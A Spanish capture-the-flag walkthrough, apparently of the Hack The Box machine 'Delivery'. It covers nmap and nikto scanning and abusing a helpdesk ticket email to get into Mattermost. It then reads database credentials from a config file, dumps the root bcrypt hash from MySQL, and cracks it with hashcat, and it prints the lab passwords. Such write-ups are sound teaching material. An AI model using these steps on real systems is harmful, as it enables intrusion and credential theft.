nmap -A -p- -oA sink 10.129.151.232 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA sink 10.129.151.232

nmap -sU -O -p- -oA sink-udp 10.129.151.232

nikto -h 10.129.151.232:80

Pasted image 20220204063324.png

Pasted image 20220204063410.png

whatweb http://10.129.151.232

Pasted image 20220204064300.png

http://10.129.151.232/:8065/login

Pasted image 20220204064621.png

http://helpdesk.delivery.htb

Pasted image 20220204064705.png

Creamos un tiquete

Pasted image 20220204183100.png

Adquirimos un tiquete 2494997 y tratamos de ver el estatus de nuestro tiquete.

Pasted image 20220204183240.png

Ahora nos vamos a mattermost Y metemos la siguiente informacion.

Pasted image 20220204183719.png

Ahora vemos la siguiente informacion. copiamos el url. Por ejemplo el que empieza asi: http://delivery.htb:8065/do_verify_email?token=...

Pasted image 20220204183754.png

http://delivery.htb:8065/select_team

Pasted image 20220204183917.png

Ahora podemos ver las credenciales:

Credenciales-> maildeliverer:Youve_G0t_Mail!

Pasted image 20220204184320.png

sh maildeliver@delivery.htb

Pasted image 20220204184435.png

id

sudo -l

cd /

find \-perm -4000 2>/dev/null

Pasted image 20220204184727.png

getcap -r 2>/dev/null

uname -a

lsb_release -a

Pasted image 20220204184954.png

Creamos un archivo pwd con el siguiente texto PleaseSubscribe!

hashcat --stdout pwd -r /usr/share/hashcat/rules/best64.rule

![[Pasted image 20220204185313.png]]

hashcat --stdout pwd -r /usr/share/hashcat/rules/best64.rule > passwords

Pasted image 20220204185412.png

cat /etc/sshd_config | grep -i permit_root_login

cat /etc/sshd_config | grep -i root

git clone https://github.com/hemp3l/sucrack

cd sucrack

./configure

make

Pasted image 20220204185708.png

cat /opt/mattermost/config/config.json | grep DataSource

Pasted image 20220204192117.png

mysql -umuser -pCrack_The_MM_Admin_PW

use mattermost

select Username,Password,Email from Users where Username="root"

Pasted image 20220204192416.png

hashcat -a 0 -m 3200 hash dict -r /usr/share/hashcat/rules/best64.rule

Pasted image 20220205084330.png

root:PleaseSubscribe!21

Pasted image 20220204192001.png

boxes

copyright©2022 Cu3rv0x all rights reserved